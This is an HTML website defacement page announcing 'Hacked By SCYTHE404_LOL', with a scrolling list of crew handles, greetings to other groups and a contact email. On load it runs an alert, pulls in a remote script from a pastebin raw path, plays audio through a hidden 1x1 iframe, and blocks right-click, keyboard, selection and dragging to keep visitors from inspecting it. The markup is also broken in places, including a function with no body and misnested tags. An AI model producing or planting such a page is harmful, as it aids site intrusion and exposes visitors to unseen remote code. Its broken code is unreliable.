<html><pre>
<html>
<head>
<script>
alert("Boo")
</script>
<script type="text/javascript">
var rev = "fwd";
function titlebar(val)
</script>
<title>/!\ SCYTHE404_LOL /!\</title>
<script src="../pastebin.com/raw/J4FXBYUh"></script>
<style>
body{
color: #fff;
margin-top:50;
margin:50 auto;
font-family: Play, cursive;
background-image: url(../s27.postimg.org/u3ah9bzn7/123123.jpg);
background-position: center; 
background-size:100%; 
background-repeat: no-repeat; 
background-attachment: fixed;
background-size:cover;
text-align:center;
}
H2{
font-size: 85px;
color:#fff;
font-family: Chiller;
text-shadow: 0 0 10px #000000,0 0 20px #FF0000,0 0 40px #FF0000,0 0 60px #FF0000,0 0 90px #FF0000,0 0 5px #FF0000;
}
a{
color: #fff;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #3399ff, 0px 0px 20px #3399ff;;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
<iframe width="1" height="1" src="https://www.youtube.com/embed/WZt7YEuLQ1U?rel=0&autoplay=1" frameborder="0" allowfullscreen></iframe>
<center>
<font size="10"><font face="Chiller">We Are N<font color="Red">45</Font>HT sec</Font></Font>
<h2>
Hacked By SCYTHE404_LOL
</center>
</H2>
<center>
We Are</center>
<marquee behavior='alternate' scrollamount='3' width='80%'>| IdaRahma | Kill Me | siluman.nanas | Noob_orb |  Broken Angel | ShinChan | r007@unkn0wn | Mr.xAnon 404 Dot_ID! | ./Mr.Blank007 | Mister$ | Hackrypton | PETR03X | R3xYn-01` | <font color="Red">SCYTHE404_LOL</Font> | MRY | J4NC0K | BOCAH KRIMINAL | kasian | MrX404 | /mr.Andro0TFL | Triple A | Owl403 | FRU_403 |</marquee>
<center>
Greetz</center>
<center>
 | MilnicFe_hax0r | ~GeNoS~ | Dark_Oracle | C1RCL3 | </center>
<center>
Contact Me :D 
ryukiddosanin<font color="Red">@</Font>gmail.com
</center>
<tbody>
</script>
</center>
</html>
